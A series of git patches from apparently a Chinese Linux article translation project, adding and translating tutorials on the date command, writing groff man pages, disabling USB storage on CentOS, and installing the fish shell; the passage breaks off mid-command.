deletions(-) diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md index 8c5507a030..1cd590bdd2 100644 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ b/sources/tech/20170921 How to answer questions in a helpful way.md @@ -18,9 +18,10 @@ * ** 问他们更具体的信息 ** 他们并没有提供(”你使用 IPv6 ?”) -* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。这些策略很多来自 [如何提出有意义的问题][2]。(尽管我永远不会对某人说“噢,你得先看完文档 “如何提出有意义的问题” 再来问我问题) +* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。 + +这些策略很多来自 [如何提出有意义的问题][2]中的要点。(尽管我永远不会对某人说“噢,你得先看完文档 “如何提出有意义的问题” 再来问我问题) -这些策略很多来自[如何提出有意义的问题][2]中的要点。 ### 明白什么是他们已经知道的 @@ -48,11 +49,11 @@ Harold Treen 给了我一个很好的例子: * Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! -如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以如果只说“它在 bash 手册中有说明”是没有帮助的:) +如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以如果只说“它在 bash 手册中有说明”是没有帮助的:) ### 告诉他们一个有用的搜索 -在工作中,我经常发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案。 +在工作中,我经常发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案:) ### 写新文档 From 2459017c83db3677c6559e7410dc8cbcd6d4957a Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 14:41:09 +0800 Subject: [PATCH 0404/1627] take a break --- ...05 How to Use the Date Command in Linux.md | 152 +++++++++--------- 1 file changed, 75 insertions(+), 77 deletions(-) diff --git a/sources/tech/20171205 How to Use the Date Command in Linux.md b/sources/tech/20171205 How to Use the Date Command in Linux.md index 14d9690f1e..2cd7cd6877 100644 --- a/sources/tech/20171205 How to Use the Date Command in Linux.md +++ b/sources/tech/20171205 How to Use the Date Command in Linux.md @@ -1,12 +1,10 @@ -translating by lujun9972 -translating by lujun9972 -How to Use the Date Command in Linux +如何使用 Date 命令 ====== -In this post, we will show you some examples on how to use the date command in Linux. The date command can be used to print or set the system date and time. Using the Date Command in Linux its simple, just follow the examples and the syntax below. +在本文中, 我们会通过一些案例来演示如何使用 linux 中的 date 命令. date 命令可以用户输出/设置系统日期和时间. Date 命令很简单, 请参见下面的例子和语法. -By default when running the date command in Linux, without any arguments it will display the current system date and time: +默认情况下,当不带任何参数运行 date 命令时,它会输出当前系统日期和时间: -``` +```shell date ``` @@ -14,7 +12,7 @@ date Sat 2 Dec 12:34:12 CST 2017 ``` -#### Syntax +#### 语法 ``` Usage: date [OPTION]... [+FORMAT] @@ -23,133 +21,133 @@ Display the current time in the given FORMAT, or set the system date. ``` -### Date examples +### 案例 -The following examples will show you how to use the date command to find the date and time from a period of time in the past or future. +下面这些案例会向你演示如何使用 date 命令来查看前后一段时间的日期时间. -### 1\. Find the date 5 weeks in the future +#### 1\. 查找5周后的日期 -``` +```shell date -d "5 weeks" Sun Jan 7 19:53:50 CST 2018 ``` -### 2\. Find the date 5 weeks and 4 days in the future +#### 2\. 查找5周后又过4天的日期 -``` +```shell date -d "5 weeks 4 days" Thu Jan 11 19:55:35 CST 2018 ``` -### 3\. Get the next month date +#### 3\. 获取下个月的日期 -``` +```shell date -d "next month" Wed Jan 3 19:57:43 CST 2018 ``` -### 4\. Get the last sunday date +#### 4\. 获取下周日的日期 -``` +```shell date -d last-sunday Sun Nov 26 00:00:00 CST 2017 ``` -The date command comes with various formatting option, the following examples will show you how to format the date command output. +date 命令还有很多格式化相关的选项, 下面的例子向你演示如何格式化 date 命令的输出. -### 5\. Display the date in yyyy-mm-dd format +#### 5\. 以 yyyy-mm-dd 的格式显示日期 -``` +```shell date +"%F" 2017-12-03 ``` -### 6\. Display date in mm/dd/yyyy format +#### 6\. 以 mm/dd/yyyy 的格式显示日期 -``` +```shell date +"%m/%d/%Y" 12/03/2017 ``` -### 7\. Display only the time +#### 7\. 只显示时间 -``` +```shell date +"%T" 20:07:04 ``` -### 8\. Display the day of the year +#### 8\. 显示今天是一年中的第几天 -``` +```shell date +"%j" 337 ``` -### 9\. Formatting Options +#### 9\. 与格式化相关的选项 -| **%%** | A literal percent sign (“**%**“). | -| **%a** | The abbreviated weekday name (e.g., **Sun**). | -| **%A** | The full weekday name (e.g., **Sunday**). | -| **%b** | The abbreviated month name (e.g., **Jan**). | -| **%B** | Locale’s full month name (e.g., **January**). | -| **%c** | The date and time (e.g., **Thu Mar 3 23:05:25 2005**). | -| **%C** | The current century; like **%Y**, except omit last two digits (e.g., **20**). | -| **%d** | Day of month (e.g., **01**). | -| **%D** | Date; same as **%m/%d/%y**. | -| **%e** | Day of month, space padded; same as **%_d**. | -| **%F** | Full date; same as **%Y-%m-%d**. | -| **%g** | Last two digits of year of ISO week number (see **%G**). | -| **%G** | Year of ISO week number (see **%V**); normally useful only with **%V**. | -| **%h** | Same as **%b**. | -| **%H** | Hour (**00**..**23**). | -| **%I** | Hour (**01**..**12**). | -| **%j** | Day of year (**001**..**366**). | -| **%k** | Hour, space padded ( **0**..**23**); same as **%_H**. | -| **%l** | Hour, space padded ( **1**..**12**); same as **%_I**. | -| **%m** | Month (**01**..**12**). | -| **%M** | Minute (**00**..**59**). | -| **%n** | A newline. | -| **%N** | Nanoseconds (**000000000**..**999999999**). | -| **%p** | Locale’s equivalent of either **AM** or **PM**; blank if not known. | -| **%P** | Like **%p**, but lower case. | -| **%r** | Locale’s 12-hour clock time (e.g., **11:11:04 PM**). | -| **%R** | 24-hour hour and minute; same as **%H:%M**. | -| **%s** | Seconds since 1970-01-01 00:00:00 UTC. | -| **%S** | Second (**00**..**60**). | -| **%t** | A tab. | -| **%T** | Time; same as **%H:%M:%S**. | -| **%u** | Day of week (**1**..**7**); 1 is **Monday**. | -| **%U** | Week number of year, with Sunday as first day of week (**00**..**53**). | -| **%V** | ISO week number, with Monday as first day of week (**01**..**53**). | -| **%w** | Day of week (**0**..**6**); 0 is **Sunday**. | -| **%W** | Week number of year, with Monday as first day of week (**00**..**53**). | -| **%x** | Locale’s date representation (e.g., **12/31/99**). | -| **%X** | Locale’s time representation (e.g., **23:13:48**). | -| **%y** | Last two digits of year (**00**..**99**). | -| **%Y** | Year. | -| **%z** | +hhmm numeric time zone (e.g., **-0400**). | -| **%:z** | +hh:mm numeric time zone (e.g., **-04:00**). | -| **%::z** | +hh:mm:ss numeric time zone (e.g., **-04:00:00**). | -| **%:::z** | Numeric time zone with “**:**” to necessary precision (e.g., **-04**, **+05:30**). | -| **%Z** | Alphabetic time zone abbreviation (e.g., EDT). | +| **%%** | 百分号 (“**%**“). | +| **%a** | 星期的缩写形式 (像这样, **Sun**). | +| **%A** | 星期的完整形式 (像这样, **Sunday**). | +| **%b** | 缩写的月份 (像这样, **Jan**). | +| **%B** | 当前区域的月份全称 (像这样, **January**). | +| **%c** | 日期以及时间 (像这样, **Thu Mar 3 23:05:25 2005**). | +| **%C** | 本世纪; 类似 **%Y**, 但是会省略最后两位 (像这样, **20**). | +| **%d** | 月中的第几日 (像这样, **01**). | +| **%D** | 日期; 效果与 **%m/%d/%y** 一样. | +| **%e** | 月中的第几日, 会填充空格; 与 **%_d** 一样. | +| **%F** | 完整的日期; 跟 **%Y-%m-%d** 一样. | +| **%g** | 年份的后两位 (参见 **%G**). | +| **%G** | 年份 (参见 **%V**); 通常跟 **%V** 连用. | +| **%h** | 同 **%b**. | +| **%H** | 小时 (**00**..**23**). | +| **%I** | 小时 (**01**..**12**). | +| **%j** | 一年中的第几天 (**001**..**366**). | +| **%k** | 小时, 用空格填充 ( **0**..**23**); same as **%_H**. | +| **%l** | 小时, 用空格填充 ( **1**..**12**); same as **%_I**. | +| **%m** | 月份 (**01**..**12**). | +| **%M** | 分钟 (**00**..**59**). | +| **%n** | 换行. | +| **%N** | 纳秒 (**000000000**..**999999999**). | +| **%p** | 当前区域时间是上午 **AM** 还是下午 **PM**; 未知则为空哦. | +| **%P** | 类似 **%p**, 但是用小写字母现实. | +| **%r** | 当前区域的12小时制现实时间 (像这样, **11:11:04 PM**). | +| **%R** | 24-小时制的小时和分钟; 同 **%H:%M**. | +| **%s** | 从 1970-01-01 00:00:00 UTC 到现在经历的秒数. | +| **%S** | 秒数 (**00**..**60**). | +| **%t** | tab 制表符. | +| **%T** | 时间; 同 **%H:%M:%S**. | +| **%u** | 星期 (**1**..**7**); 1 表示 **星期一**. | +| **%U** | 一年中的第几个星期, 以周日为一周的开始 (**00**..**53**). | +| **%V** | 一年中的第几个星期,以周一为一周的开始 (**01**..**53**). | +| **%w** | 用数字表示周几 (**0**..**6**); 0 表示 **周日**. | +| **%W** | 一年中的第几个星期, 周一为一周的开始 (**00**..**53**). | +| **%x** | Locale’s date representation (像这样, **12/31/99**). | +| **%X** | Locale’s time representation (像这样, **23:13:48**). | +| **%y** | 年份的后面两位 (**00**..**99**). | +| **%Y** | 年. | +| **%z** | +hhmm 指定数字时区 (像这样, **-0400**). | +| **%:z** | +hh:mm 指定数字时区 (像这样, **-04:00**). | +| **%::z** | +hh:mm:ss 指定数字时区 (像这样, **-04:00:00**). | +| **%:::z** | 指定数字时区, with “**:**” to necessary precision (e.g., **-04**, **+05:30**). | +| **%Z** | 时区的字符缩写(例如, EDT). | -### 10\. Set the system clock +#### 10\. 设置系统时间 -With the date command in Linux, you can also manually set the system clock using the --set switch, in the following example we will set the system date to 4:22pm August 30, 2017 +你也可以使用 date 来手工设置系统时间,方法是使用 `--set` 选项, 下面的例子会将系统时间设置成2017年8月30日下午4点22分 -``` +```shell date --set="20170830 16:22" ``` -Of course, if you use one of our [VPS Hosting services][1], you can always contact and ask our expert Linux admins (via chat or ticket) about date command in linux and anything related to date examples on Linux. They are available 24×7 and will provide information or assistance immediately. +当然, 如果你使用的是我们的 [VPS Hosting services][1], 你总是可以联系并咨询我们的Linux专家管理员 (通过客服电话或者下工单的方式) 关于 date 命令的任何东西. 他们是 24×7 在线的,会立即向您提供帮助. -PS. If you liked this post on How to Use the Date Command in Linux please share it with your friends on the social networks using the buttons below or simply leave a reply. Thanks. +PS. 如果你喜欢这篇帖子,请点击下面的按钮分享或者留言. 谢谢. -------------------------------------------------------------------------------- From 53e28ec21671e525827bafd80a67c8b7077cd2e8 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 14:41:59 +0800 Subject: [PATCH 0405/1627] =?UTF-8?q?=E9=80=89=E9=A2=98=EF=BC=9A19951001?= =?UTF-8?q?=20Writing=20man=20Pages=20Using=20groff.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @oska874 --- .../19951001 Writing man Pages Using groff.md | 156 ++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 sources/tech/19951001 Writing man Pages Using groff.md diff --git a/sources/tech/19951001 Writing man Pages Using groff.md b/sources/tech/19951001 Writing man Pages Using groff.md new file mode 100644 index 0000000000..3ba749bc66 --- /dev/null +++ b/sources/tech/19951001 Writing man Pages Using groff.md @@ -0,0 +1,156 @@ +Writing man Pages Using groff +=================== + +groff is the GNU version of the popular nroff/troff text-formatting tools provided on most Unix systems. Its most common use is writing manual pages—online documentation for commands, programming interfaqces, and so forth. In this article, we show you the ropes of writing your own man pages with groff. + +Two of the original text processing systems found on Unix systems are troff and nroff, developed at Bell Labs for the original implementation of Unix (in fact, the development of Unix itself was spurred, in part, to support such a text-processing system). The first version of this text processor was called roff (for “runoff”); later came troff, which generated output for a particular typesetter in use at the time. nroff was a later version that became the standard text processor on Unix systems everywhere. groff is GNU's implementation of nroff and troff that is used on Linux systems. It includes several extended features and drivers for a number of printing devices. + +groff is capable of producing documents, articles, and books, much in the same vein as other text-formatting systems, such as TeX. However, groff (as well as the original nroff) has one intrinsic feature that is absent from TeX and variants: the ability to produce plain-ASCII output. While other systems are great for producing documents to be printed, groff is able to produce plain ASCII to be viewed online (or printed directly as plain text on even the simplest of printers). If you're going to be producing documentation to be viewed online, as well as in printed form, groff may be the way to go (although there are alternatives, such as Texinfo, Lametex, and other tools). + +groff also has the benefit of being much smaller than TeX; it requires fewer support files and executables than even a minimal TeX distribution. + +One special application of groff is to format Unix man pages. If you're a Unix programmer, you'll eventually need to write and produce man pages of some kind. In this article, we'll introduce the use of groff through the writing of a short man page. + +As with TeX, groff uses a particular text-formatting language to describe how to process the text. This language is slightly more cryptic than systems such as TeX, but also less verbose. In addition, groff provides several macro packages that are used on top of the basic formatter; these macro packages are tailored to a particular type of document. For example, the mgs macros are an ideal choice for writing articles and papers, while the man macros are used for man pages. + +### Writing a man Page + +Writing man pages with groff is actually quite simple. For your man page to look like others, you need to follow several conventions in the source, which are presented below. In this example, we'll write a man page for a mythical command coffee that controls your networked coffee machine in various ways. + +Using any text editor, enter the source from Listing 1 and save the result as coffee.man. Do not enter the line numbers at the beginning of each line; those are used only for reference later in the article. + +``` +.TH COFFEE 1 "23 March 94" +.SH NAME +coffee /- Control remote coffee machine +.SH SYNOPSIS +/fBcoffee/fP [ -h | -b ] [ -t /fItype/fP ] +/fIamount/fP +.SH DESCRIPTION +/fBcoffee/fP queues a request to the remote +coffee machine at the device /fB/dev/cf0/fR. +The required /fIamount/fP argument specifies +the number of cups, generally between 0 and +12 on ISO standard coffee machines. +.SS Options +.TP +/fB-h/fP +Brew hot coffee. Cold is the default. +.TP +/fB-b/fP +Burn coffee. Especially useful when executing +/fBcoffee/fP on behalf of your boss. +.TP +/fB-t /fItype/fR +Specify the type of coffee to brew, where +/fItype/fP is one of /fBcolumbian/fP, +/fBregular/fP, or /fBdecaf/fP. +.SH FILES +.TP +/fC/dev/cf0/fR +The remote coffee machine device +.SH "SEE ALSO" +milk(5), sugar(5) +.SH BUGS +May require human intervention if coffee +supply is exhausted. +``` + +Don't let the amount of obscurity in this source file frighten you. It helps to know that the character sequences \fB, \fI, and \fR are used to change the font to boldface, italics, and roman type, respectively. \fP sets the font to the one previously selected. + +Other groff requests appear on lines beginning with a dot (.). On line 1, we see that the .TH request is used to set the title of the man page to COFFEE, the man section to 1, and the date of the last man page revision. (Recall that man section 1 is used for user commands, section 2 is for system calls, and so forth. The man man command details each section number.) On line 2, the .SH request is used to start a section, entitled NAME. Note that almost all Unix man pages use the section progression NAME, SYNOPSIS, DESCRIPTION, FILES, SEE ALSO, NOTES, AUTHOR, and BUGS, with extra, optional sections as needed. This is just a convention used when writing man pages and isn't enforced by the software at all. + +Line 3 gives the name of the command and a short description, after a dash ([mi]). You should use this format for the NAME section so that your man page can be added to the whatis database used by the man -k and apropos commands. + +On lines 4—6 we give the synopsis of the command syntax for coffee. Note that italic type \fI...\fP is used to denote parameters on the command line, and that optional arguments are enclosed in square brackets. + +Lines 7—12 give a brief description of the command. Boldface type is generally used to denote program and file names. On line 13, a subsection named Options is started with the .SS request. Following this on lines 14—25 is a list of options, presented using a tagged list. Each item in the tagged list is marked with the .TPrequest; the line after .TP is the tag, after which follows the item text itself. For example, the source on lines 14—16: + +``` +.TP +\fB-h\P +Brew hot coffee. Cold is the default. +``` + +``` +-h Brew hot coffee. Cold is the default. +``` + +Lines 26—29 make up the FILES section of the man page, which describes any files that the command might use to do its work. A tagged list using the .TP request is used for this as well. + +On lines 30—31, the SEE ALSO section is given, which provides cross-references to other man pages of note. Notice that the string <\#34>SEE ALSO<\#34>following the .SH request on line 30 is in quotes; this is because .SH uses the first whitespace-delimited argument as the section title. Therefore any section titles that are more than one word need to be enclosed in quotes to make up a single argument. Finally, on lines 32—34, the BUGS section is presented. + +### Formatting and Installing the man Page + +In order to format this man page and view it on your screen, you can use the command: + +``` +$ groff -Tascii -man coffee.man | more +``` + +``` +COFFEE(1) COFFEE(1) +NAME + coffee - Control remote coffee machine +SYNOPSIS + coffee [ -h | -b ] [ -t type ] amount +DESCRIPTION + coffee queues a request to the remote coffee machine at + the device /dev/cf0\. The required amount argument speci- + fies the number of cups, generally between 0 and 12 on ISO + standard coffee machines. + Options + -h Brew hot coffee. Cold is the default. + -b Burn coffee. Especially useful when executing cof- + fee on behalf of your boss. + -t type + Specify the type of coffee to brew, where type is + one of columbian, regular, or decaf. +FILES + /dev/cf0 + The remote coffee machine device +SEE ALSO + milk(5), sugar(5) +BUGS + May require human intervention if coffee supply is + exhausted. +``` + +As mentioned before, groff is capable of producing other types of output. Using the -Tps option in place of -Tascii will produce PostScript output that you can save to a file, view with GhostView, or print on a PostScript printer. -Tdvi will produce device-independent .dvi output similar to that produced by TeX. + +If you wish to make the man page available for others to view on your system, you need to install the groff source in a directory that is present in other users' MANPATH. The location for standard man pages is /usr/man. The source for section 1 man pages should therefore go in /usr/man/man1\. Therefore, the command: + +``` +$ cp coffee.man /usr/man/man1/coffee.1 +``` + +If you can't copy man page sources directly to /usr/man (say, because you're not the system administrator), you can create your own man page directory tree and add it to your MANPATH. The MANPATH environment variable is of the same format asPATH; for example, to add the directory /home/mdw/man to MANPATH just use: + +``` +$ export MANPATH=/home/mdw/man:$MANPATH +``` + +``` +groff -Tascii -mgs files... +``` + +Unfortunately, the macro sets provided with groff are not well-documented. There are section 7 man pages for some of them; for example, man 7 groff_mm will tell you about the mm macro set. However, this documentation usually only covers the differences and new features in the groff implementation, which assumes you have access to the man pages for the original nroff/troff macro sets (known as DWB—the Documentor's Work Bench). The best source of information may be a book on using nroff/troff which covers these classic macro sets in detail. For more about writing man pages, you can always look at the man page sources (in /usr/man) and determine what they do by comparing the formatted output with the source. + +This article is adapted from Running Linux, by Matt Welsh and Lar Kaufman, published by O'Reilly and Associates (ISBN 1-56592-100-3). Among other things, this book includes tutorials of various text-formatting systems used under Linux. Information in this issue of Linux Journal as well as Running Linux should provide a good head-start on using the many text tools available for the system. + +### Good luck, and happy documenting! + +Matt Welsh ([mdw@cs.cornell.edu][1]) is a student and systems programmer at Cornell University, working with the Robotics and Vision Laboratory on projects dealing with real-time machine vision. + +-------------------------------------------------------------------------------- + +via: http://www.linuxjournal.com/article/1158 + +作者:[Matt Welsh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxjournal.com/user/800006 +[1]:mailto:mdw@cs.cornell.edu \ No newline at end of file From f09c088bb375d36186b41cf0c721905a4a215aaf Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 14:44:17 +0800 Subject: [PATCH 0406/1627] translating 19951001 Writing man Pages Using groff.md --- sources/tech/19951001 Writing man Pages Using groff.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/19951001 Writing man Pages Using groff.md b/sources/tech/19951001 Writing man Pages Using groff.md index 3ba749bc66..3aad365c56 100644 --- a/sources/tech/19951001 Writing man Pages Using groff.md +++ b/sources/tech/19951001 Writing man Pages Using groff.md @@ -1,3 +1,4 @@ +translating by wxy Writing man Pages Using groff =================== From 5417ef1fd580956abb828c20aaa46bcfd0fb3364 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 14:48:26 +0800 Subject: [PATCH 0407/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20disa?= =?UTF-8?q?ble=20USB=20storage=20on=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...922 How to disable USB storage on Linux.md | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 sources/tech/20170922 How to disable USB storage on Linux.md diff --git a/sources/tech/20170922 How to disable USB storage on Linux.md b/sources/tech/20170922 How to disable USB storage on Linux.md new file mode 100644 index 0000000000..36723ed34c --- /dev/null +++ b/sources/tech/20170922 How to disable USB storage on Linux.md @@ -0,0 +1,59 @@ +translating by lujun9972 +How to disable USB storage on Linux +====== +To secure our infrastructure of data breaches, we use software & hardware firewalls to restrict unauthorized access from outside but data breaches can occur from inside as well. To remove such a possibility, organizations limit & monitor the access to internet & also disable usb storage devices. + +In this tutorial, we are going to discuss three different ways to disable USB storage devices on Linux machines. All the three methods have been tested on CentOS 6 & 7 machine & are working as they are supposed to . So let’s discuss all the three methods one by one, + +( Also Read : [Ultimate guide to securing SSH sessions][1] ) + +### Method 1 – Fake install + +In this method, we add a line ‘install usb-storage /bin/true’ which causes the ‘/bin/true’ to run instead of installing usb-storage module & that’s why it’s also called ‘Fake Install’ . To do this, create and open a file named ‘block_usb.conf’ (it can be something as well) in the folder ‘/etc/modprobe.d’, + +$ sudo vim /etc/modprobe.d/block_usb.conf + +& add the below mentioned line, + +install usb-storage /bin/true + +Now save the file and exit. + +### Method 2 – Removing the USB driver + +Using this method, we can remove/move the drive for usb-storage (usb_storage.ko) from our machines, thus making it impossible to access a usb-storage device from the mahcine. To move the driver from it’s default location, execute the following command, + +$ sudo mv /lib/modules/$(uname -r)/kernel/drivers/usb/storage/usb-storage.ko /home/user1 + +Now the driver is not available on its default location & thus would not be loaded when a usb-storage device is attached to the system & device would not be able to work. But this method has one little issue, that is when the kernel of the system is updated the usb-storage module would again show up in it’s default location. + +### Method 3- Blacklisting USB-storage + +We can also blacklist usb-storage using the file ‘/etc/modprobe.d/blacklist.conf’. This file is available on RHEL/CentOS 6 but might need to be created on 7\. To blacklist usb-storage, open/create the above mentioned file using vim, + +$ sudo vim /etc/modprobe.d/blacklist.conf + +& enter the following line to blacklist the usb, + +blacklist usb-storage + +Save file & exit. USB-storage will now be blocked on the system but this method has one major downside i.e. any privileged user can load the usb-storage module by executing the following command, + +$ sudo modprobe usb-storage + +This issue makes this method somewhat not desirable but it works well for non-privileged users. + +Reboot your system after the changes have been made to implement the changes made for all the above mentioned methods. Do check these methods to disable usb storage & let us know if you face any issue or have a query using the comment box below. + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/disable-usb-storage-linux/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/ultimate-guide-to-securing-ssh-sessions/ From eefd9dad8d4979cd89816a490fdae763c7797cb9 Mon Sep 17 00:00:00 2001 From: erlinux Date: Fri, 8 Dec 2017 15:07:14 +0800 Subject: [PATCH 0408/1627] Translating By erlinux --- sources/tech/20171123 Why microservices are a security issue.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171123 Why microservices are a security issue.md b/sources/tech/20171123 Why microservices are a security issue.md index d5868faa9e..0bda05860e 100644 --- a/sources/tech/20171123 Why microservices are a security issue.md +++ b/sources/tech/20171123 Why microservices are a security issue.md @@ -1,3 +1,5 @@ +**translating by [erlinux](https://github.com/erlinux)** + Why microservices are a security issue ============================================================ From f48edad1b0b45e90a6ec36cf343089d3a2064603 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 15:09:00 +0800 Subject: [PATCH 0409/1627] translated --- sources/tech/20171205 How to Use the Date Command in Linux.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171205 How to Use the Date Command in Linux.md b/sources/tech/20171205 How to Use the Date Command in Linux.md index 2cd7cd6877..9564b72e69 100644 --- a/sources/tech/20171205 How to Use the Date Command in Linux.md +++ b/sources/tech/20171205 How to Use the Date Command in Linux.md @@ -133,7 +133,7 @@ date +"%j" | **%z** | +hhmm 指定数字时区 (像这样, **-0400**). | | **%:z** | +hh:mm 指定数字时区 (像这样, **-04:00**). | | **%::z** | +hh:mm:ss 指定数字时区 (像这样, **-04:00:00**). | -| **%:::z** | 指定数字时区, with “**:**” to necessary precision (e.g., **-04**, **+05:30**). | +| **%:::z** | 指定数字时区, 其中 “**:**” 的个数由你需要的精度来决定 (例如, **-04**, **+05:30**). | | **%Z** | 时区的字符缩写(例如, EDT). | #### 10\. 设置系统时间 From 33a73d24329df49349f7d22e84d560c867216bdb Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 15:11:07 +0800 Subject: [PATCH 0410/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171205 How to Use the Date Command in Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171205 How to Use the Date Command in Linux.md (100%) diff --git a/sources/tech/20171205 How to Use the Date Command in Linux.md b/translated/tech/20171205 How to Use the Date Command in Linux.md similarity index 100% rename from sources/tech/20171205 How to Use the Date Command in Linux.md rename to translated/tech/20171205 How to Use the Date Command in Linux.md From 81bc1652701be97a9f10c6e9caa81baf181d1d61 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 15:30:28 +0800 Subject: [PATCH 0411/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Inst?= =?UTF-8?q?all=20Fish,=20The=20Friendly=20Interactive=20Shell,=20In=20Linu?= =?UTF-8?q?x?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...he Friendly Interactive Shell, In Linux.md | 336 ++++++++++++++++++ 1 file changed, 336 insertions(+) create mode 100644 sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md diff --git a/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md b/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md new file mode 100644 index 0000000000..eaecb18a0a --- /dev/null +++ b/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md @@ -0,0 +1,336 @@ +How To Install Fish, The Friendly Interactive Shell, In Linux +====== +Fish, acronym of friendly interactive shell, is a well equipped, smart and user-friendly shell for Unix-like systems. Fish comes with many significant features, such as autosuggestions, syntax highlighting, searchable history (like CTRL+r in Bash), smart search functionality, glorious VGA color support, web based configuration, man page completions and many, out of the box. Just install it and start using it in no time. No more extra configuration or you don’t have to install any extra add-ons/plug-ins! + +In this tutorial, let us discuss how to install and use fish shell in Linux. + +#### Install Fish + +Even though fish is very user-friendly and feature-rich shell, it is not included in the default repositories of most Linux distributions. It is available in the official repositories of only few Linux distributions such as Arch Linux, Gentoo, NixOS, and Ubuntu etc. However, installing fish is not a big deal. + +On Arch Linux and its derivatives, run the following command to install it. + +``` +sudo pacman -S fish +``` + +On CentOS 7 run the following as root: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_7/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +On CentOS 6 run the following as root: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_6/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +On Debian 9 run the following as root: + +``` +wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_9.0/Release.key -O Release.key +``` + +``` +apt-key add - < Release.key +``` + +``` +echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_9.0/ /' > /etc/apt/sources.list.d/fish.list +``` + +``` +apt-get update +``` + +``` +apt-get install fish +``` + +On Debian 8 run the following as root: + +``` +wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_8.0/Release.key -O Release.key +``` + +``` +apt-key add - < Release.key +``` + +``` +echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_8.0/ /' > /etc/apt/sources.list.d/fish.list +``` + +``` +apt-get update +``` + +``` +apt-get install fish +``` + +On Fedora 26 run the following as root: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_26/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +On Fedora 25 run the following as root: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_25/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +On Fedora 24 run the following as root: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_24/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +On Fedora 23 run the following as root: + +``` +dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_23/shells:fish:release:2.repo +``` + +``` +dnf install fish +``` + +On openSUSE: run the following as root: + +``` +zypper install fish +``` + +On RHEL 7 run the following as root: + +``` +cd /etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/RHEL_7/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +On RHEL-6 run the following as root: + +``` +cd 